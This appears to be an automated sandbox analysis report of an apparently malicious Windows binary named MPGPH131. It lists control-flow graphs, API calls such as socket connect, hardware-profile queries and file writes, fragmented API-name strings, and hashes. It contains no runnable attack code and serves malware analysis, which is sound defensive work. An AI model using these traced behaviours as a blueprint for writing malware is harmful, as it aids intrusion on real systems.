22569 91acaf RtlAllocateHeap __dosmaperr 22560->22569 22564 92e7da 22561->22564 22570 91acaf RtlAllocateHeap __dosmaperr 22561->22570 22563 92e7c6 22563->22554 22564->22554 22566 92e7fb 22571 912210 RtlAllocateHeap ___std_exception_copy 22566->22571 22568->22555 22569->22563 22570->22566 22571->22563 22577 92814e 22572->22577 22574 91bade 22575 91bafa SetFilePointerEx 22574->22575 22576 91bae6 22574->22576 22575->22576 22576->22519 22578 928170 22577->22578 22579 92815b 22577->22579 22584 928195 22578->22584 22592 91ac9c RtlAllocateHeap __dosmaperr 22578->22592 22590 91ac9c RtlAllocateHeap __dosmaperr 22579->22590 22581 928160 22591 91acaf RtlAllocateHeap __dosmaperr 22581->22591 22584->22574 22585 9281a0 22593 91acaf RtlAllocateHeap __dosmaperr 22585->22593 22587 9281a8 22594 912210 RtlAllocateHeap ___std_exception_copy 22587->22594 22588 928168 22588->22574 22590->22581 22591->22588 22592->22585 22593->22587 22594->22588

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 e07044-e07074 GetPEB 1 e07077-e0709a 0->1 2 e0709d-e070a0 1->2 3 e070a6-e070bc 2->3 4 e071ee-e0722b CreateFileA 2->4 5 e07110-e07116 3->5 6 e070be-e070c5 3->6 21 e07265-e07269 4->21 22 e0722d-e07230 4->22 8 e07118-e0711f 5->8 9 e07129-e0712f 5->9 6->5 10 e070c7-e070ce 6->10 8->9 11 e07121-e07124 8->11 12 e07131-e07138 9->12 13 e07148-e0714e 9->13 10->5 14 e070d0-e070d7 10->14 16 e071bb-e071c0 11->16 12->13 17 e0713a-e07141 12->17 18 e07150-e07157 13->18 19 e07167-e0716f 13->19 14->5 20 e070d9-e070dd 14->20 24 e071e0-e071e9 16->24 25 e071c2-e071c5 16->25 17->13 23 e07143-e07146 17->23 18->19 26 e07159-e07160 18->26 27 e07171-e07178 19->27 28 e07188-e0718e 19->28 20->5 29 e070df-e070e3 20->29 32 e07232-e07238 22->32 23->16 24->2 25->24 33 e071c7-e071ca 25->33 26->19 34 e07162-e07165 26->34 27->28 35 e0717a-e07181 27->35 30 e07190-e07197 28->30 31 e071a7-e071ad 28->31 29->16 36 e070e9-e0710b 29->36 30->31 37 e07199-e071a0 30->37 31->16 38 e071af-e071b6 31->38 39 e07246-e07251 32->39 40 e0723a-e07242 32->40 33->24 41 e071cc-e071cf 33->41 34->16 35->28 42 e07183-e07186 35->42 36->1 37->31 44 e071a2-e071a5 37->44 38->16 45 e071b8 38->45 48 e07255-e07261 39->48 40->32 46 e07244 40->46 41->24 47 e071d1-e071d4 41->47 42->16 44->16 45->16 46->48 47->24 49 e071d6-e071d9 47->49 48->21 49->24 50 e071db-e071de 49->50 50->4 50->24
                                    APIs
                                    • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00E07223
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID: .dll$Clos$Crea$GetM$GetT$Kern$MlpxPf.exe$WinE$Writ$athA$catA$dleA$el32$lstr$odul
                                    • API String ID: 823142352-650681566
                                    • Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                    • Instruction ID: 42c59f00e1eedd9f801db889e395201809067f4dbc25380a7ce7abbf80ff645a
                                    • Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                    • Instruction Fuzzy Hash: 63610D74D0A215DBCF24CF94C844AADB7B0BF48319F25A5AAD5857B2C1C370AEC1CB91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 52 84db60-84db92 WSAStartup 53 84dc66-84dc6f 52->53 54 84db98-84dbc2 call 837d20 * 2 52->54 59 84dbc4-84dbc8 54->59 60 84dbce-84dc14 54->60 59->53 59->60 62 84dc16-84dc1c 60->62 63 84dc60 60->63 64 84dc74-84dc7e 62->64 65 84dc1e 62->65 63->53 64->63 69 84dc80-84dc88 64->69 66 84dc24-84dc38 socket 65->66 66->63 67 84dc3a-84dc4a connect 66->67 70 84dc70 67->70 71 84dc4c-84dc54 closesocket 67->71 70->64 71->66 72 84dc56-84dc5a 71->72 72->63
                                    APIs
                                    • WSAStartup.WS2_32 ref: 0084DB8B
                                    • socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 0084DC2E
                                    • connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 0084DC42
                                    • closesocket.WS2_32(00000000), ref: 0084DC4D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Startupclosesocketconnectsocket
                                    • String ID: 50500$`4u
                                    • API String ID: 3098855095-1883443620
                                    • Opcode ID: 2dd402dd94c68f3afb362514ba8549ffd176e0b1d253c8c63ddf144f3637cb14
                                    • Instruction ID: 18081c6f53999451cd6635194afa742b9527dee88daed567605308f670ef726a
                                    • Opcode Fuzzy Hash: 2dd402dd94c68f3afb362514ba8549ffd176e0b1d253c8c63ddf144f3637cb14
                                    • Instruction Fuzzy Hash: 8E31A1726047496BC7209B288C84A3BB7E5FF89734F001F19F9A8932E0E37199158692

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 73 4de081f-4de0846 74 4de0847-4de0850 GetCurrentHwProfileW 73->74 75 4de0865-4de0a96 call 4de0a97 74->75
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04DE0849
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3931136502.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_4de0000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 1deea5d023b642f0718dbb7ef1e6a26ba17fcf54b20df732b311bf8e1c2e0c53
                                    • Instruction ID: 45c55fc04c45c6700ac01b26fb8e84716ddd91f9b7bec110d9b3005935fb3ecf
                                    • Opcode Fuzzy Hash: 1deea5d023b642f0718dbb7ef1e6a26ba17fcf54b20df732b311bf8e1c2e0c53
                                    • Instruction Fuzzy Hash: D9313CFB74C125BCB102A5422F54EFB676DE2D6730331C82BF987D1406E3D49A4AA131

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 101 4de07d1-4de07d2 102 4de0847-4de0850 GetCurrentHwProfileW 101->102 103 4de07d4-4de0819 call 4de0831 101->103 105 4de0865-4de0a96 call 4de0a97 102->105 103->102
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04DE0849
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3931136502.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_4de0000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 699bc0372b5cc6b476f90009b8c55e70b4d62cdbd0f593f8e55f0c1fc875444d
                                    • Instruction ID: 1ab494aefec4180d56d9dcbbf5bd7d0d58718f0ae26251d77de07ad59cef72e5
                                    • Opcode Fuzzy Hash: 699bc0372b5cc6b476f90009b8c55e70b4d62cdbd0f593f8e55f0c1fc875444d
                                    • Instruction Fuzzy Hash: 0B3137EB34C135BCB102A5432FA4EFB676DE1C6730730882BF987C1506E7D4AA4AA031

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 191 4de0831-4de0850 GetCurrentHwProfileW 193 4de0865-4de0a96 call 4de0a97 191->193
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04DE0849
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3931136502.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_4de0000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: d55954a0bc11e43c44fc3d57489e00b73e24d918de9981ba7a0ddc462cc07596
                                    • Instruction ID: 89afb4939566edd56ae593d194f210734aec4ee8b641634e4f4828e6a1eaf1c6
                                    • Opcode Fuzzy Hash: d55954a0bc11e43c44fc3d57489e00b73e24d918de9981ba7a0ddc462cc07596
                                    • Instruction Fuzzy Hash: D731E7EB74C1357CB142A5422F64EFB576DE1D6730731C82BF987D1406E7D49A4AA031

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 133 922f0c-922f2e 134 923121 133->134 135 922f34-922f36 133->135 138 923123-923127 134->138 136 922f62-922f85 135->136 137 922f38-922f57 call 912193 135->137 140 922f87-922f89 136->140 141 922f8b-922f91 136->141 144 922f5a-922f5d 137->144 140->141 143 922f93-922fa4 140->143 141->137 141->143 145 922fa6-922fb4 call 91bbed 143->145 146 922fb7-922fc7 call 922a51 143->146 144->138 145->146 151 923010-923022 146->151 152 922fc9-922fcf 146->152 155 923024-92302a 151->155 156 923079-923099 WriteFile 151->156 153 922fd1-922fd4 152->153 154 922ff8-92300e call 922622 152->154 157 922fd6-922fd9 153->157 158 922fdf-922fee call 9229e9 153->158 174 922ff1-922ff3 154->174 162 923065-923077 call 922ace 155->162 163 92302c-92302f 155->163 160 9230a4 156->160 161 92309b-9230a1 156->161 157->158 164 9230b9-9230bc 157->164 158->174 168 9230a7-9230b2 160->168 161->160 181 92304c-92304f 162->181 169 923051-923063 call 922c92 163->169 170 923031-923034 163->170 179 9230bf-9230c1 164->179 176 9230b4-9230b7 168->176 177 92311c-92311f 168->177 169->181 178 92303a-923047 call 922ba9 170->178 170->179 174->168 176->164 177->138 178->181 183 9230c3-9230c8 179->183 184 9230ef-9230fb 179->184 181->174 185 9230e1-9230ea call 91ac78 183->185 186 9230ca-9230dc 183->186 187 923105-923117 184->187 188 9230fd-923103 184->188 185->144 186->144 187->144 188->134 188->187
                                    APIs
                                    • WriteFile.KERNELBASE(?,00000000,00916AF7,?,00000000,00000000,00000000,?,00000000,?,0090C023,00916AF7,00000000,0090C023,?,?), ref: 00923091
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileWrite
                                    • String ID:
                                    • API String ID: 3934441357-0
                                    • Opcode ID: b8e88cba9b730368122fb856dafcbfcf02cb20959b88ded8e54b211938313fa9
                                    • Instruction ID: 81b277099e3d2b2559f3e718fac5f69e5afa326fa6bde8e6c35a2233945380b8
                                    • Opcode Fuzzy Hash: b8e88cba9b730368122fb856dafcbfcf02cb20959b88ded8e54b211938313fa9
                                    • Instruction Fuzzy Hash: 8A61E471D04129BFDF11DFA8E980AEEBBB9AF49304F144545E900AB25AC379DE119BA0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 219 89ba20-89ba3f 220 89bb6c call 832040 219->220 221 89ba45-89ba58 219->221 226 89bb71 call 831fa0 220->226 222 89ba5a 221->222 223 89ba83-89ba8b 221->223 225 89ba5c-89ba61 222->225 227 89ba8d-89ba92 223->227 228 89ba94-89baa4 223->228 231 89ba64-89ba65 call 90cd02 225->231 237 89bb76-89bb7b call 912220 226->237 227->225 229 89bab3-89bab5 228->229 230 89baa6-89baab 228->230 234 89bac7 229->234 235 89bab7-89bac5 call 90cd02 229->235 230->226 233 89bab1 230->233 240 89ba6a-89ba6f 231->240 233->231 239 89bac9-89baec 234->239 235->239 243 89baee-89bb18 call 90e9e0 call 90ef60 239->243 244 89bb43-89bb69 call 90e9e0 call 90ef60 239->244 240->237 245 89ba75-89ba81 240->245 255 89bb1a-89bb28 243->255 256 89bb2c-89bb40 call 90cf83 243->256 245->239 255->237 258 89bb2a 255->258 258->256
                                    APIs
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0089BB71
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Concurrency::cancel_current_task
                                    • String ID:
                                    • API String ID: 118556049-0
                                    • Opcode ID: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
                                    • Instruction ID: 8e33831dd2dc053828fe30de0cc3f36ae52405c48670f1ee53602caf4269c2db
                                    • Opcode Fuzzy Hash: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
                                    • Instruction Fuzzy Hash: CE41E2729011199FCF15EF68EE816AEB7A5FF84350F280669F815EB285D730DE1087D1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 260 922582-922596 call 92814e 263 922598-92259a 260->263 264 92259c-9225a4 260->264 265 9225ea-92260a call 9280bd 263->265 266 9225a6-9225ad 264->266 267 9225af-9225b2 264->267 275 92261c 265->275 276 92260c-92261a call 91ac78 265->276 266->267 269 9225ba-9225ce call 92814e * 2 266->269 270 9225d0-9225e0 call 92814e FindCloseChangeNotification 267->270 271 9225b4-9225b8 267->271 269->263 269->270 270->263 282 9225e2-9225e8 270->282 271->269 271->270 280 92261e-922621 275->280 276->280 282->265
                                    APIs
                                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00922469,00000000,CF830579,00961148,0000000C,00922525,0091662D,?), ref: 009225D8
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ChangeCloseFindNotification
                                    • String ID:
                                    • API String ID: 2591292051-0
                                    • Opcode ID: 91ba625b15ef6db7a1e7d3386e278e35c2809f1bc4babcbf18cb77d5d9fb1044
                                    • Instruction ID: 270bec2bd5d537e4be6a08315a6d25854c8a3133834805f82901512c77573c25
                                    • Opcode Fuzzy Hash: 91ba625b15ef6db7a1e7d3386e278e35c2809f1bc4babcbf18cb77d5d9fb1044
                                    • Instruction Fuzzy Hash: 8811443360A23436D72123747C56F7F274E9BC3734F254209F9088B1CAEE659C815191

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 286 91bacc-91bae4 call 92814e 289 91bae6-91baed 286->289 290 91bafa-91bb10 SetFilePointerEx 286->290 291 91baf4-91baf8 289->291 292 91bb12-91bb23 call 91ac78 290->292 293 91bb25-91bb2f 290->293 294 91bb4b-91bb4e 291->294 292->291 293->291 295 91bb31-91bb46 293->295 295->294
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00960E00,0090C023,00000002,0090C023,00000000,?,?,?,0091BBD6,00000000,?,0090C023,00000002,00960E00), ref: 0091BB08
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: 34141280174be12210c5d05990503a529de8040f4c78c6bcbda4d313fa92b8fb
                                    • Instruction ID: c69e8321526215cc29dae90d28546f77860bd65d2cd50f635a2b218fe2300d6a
                                    • Opcode Fuzzy Hash: 34141280174be12210c5d05990503a529de8040f4c78c6bcbda4d313fa92b8fb
                                    • Instruction Fuzzy Hash: 45012632714159AFDF068F59DC45DDE3B6AEF81330B240208F9019B2D1EB71ED818790

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 299 90cd02-90cd05 300 90cd14-90cd17 call 91b99c 299->300 302 90cd1c-90cd1f 300->302 303 90cd21-90cd22 302->303 304 90cd07-90cd12 call 91f248 302->304 304->300 307 90cd23-90cd27 304->307 308 831fa0-831ff0 call 831f80 call 90e96b call 90e0c1 307->308 309 90cd2d 307->309 309->309
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00831FDE
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID:
                                    • API String ID: 2659868963-0
                                    • Opcode ID: 781567110fbeea1bda257f4a7b9d5fcc70560875d0f2e973004847783e1755ea
                                    • Instruction ID: e6ccb5141cf9581a5bde89276abba0c05989dfeffbf60cda4aa9a53057010b58
                                    • Opcode Fuzzy Hash: 781567110fbeea1bda257f4a7b9d5fcc70560875d0f2e973004847783e1755ea
                                    • Instruction Fuzzy Hash: C001D67550430DBBCB24ABA8EC0198A7BACDE41764B508A35F918EB5D1FBB0E59087D1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 316 923e63-923e6e 317 923e70-923e7a 316->317 318 923e7c-923e82 316->318 317->318 319 923eb0-923ebb call 91acaf 317->319 320 923e84-923e85 318->320 321 923e9b-923eac RtlAllocateHeap 318->321 325 923ebd-923ebf 319->325 320->321 322 923e87-923e8e call 921a03 321->322 323 923eae 321->323 322->319 329 923e90-923e99 call 91f248 322->329 323->325 329->319 329->321
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000008,0090B16C,?,?,009237E9,00000001,00000364,?,00000006,000000FF,?,0090E0EB,?,?,?,?), ref: 00923EA4
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
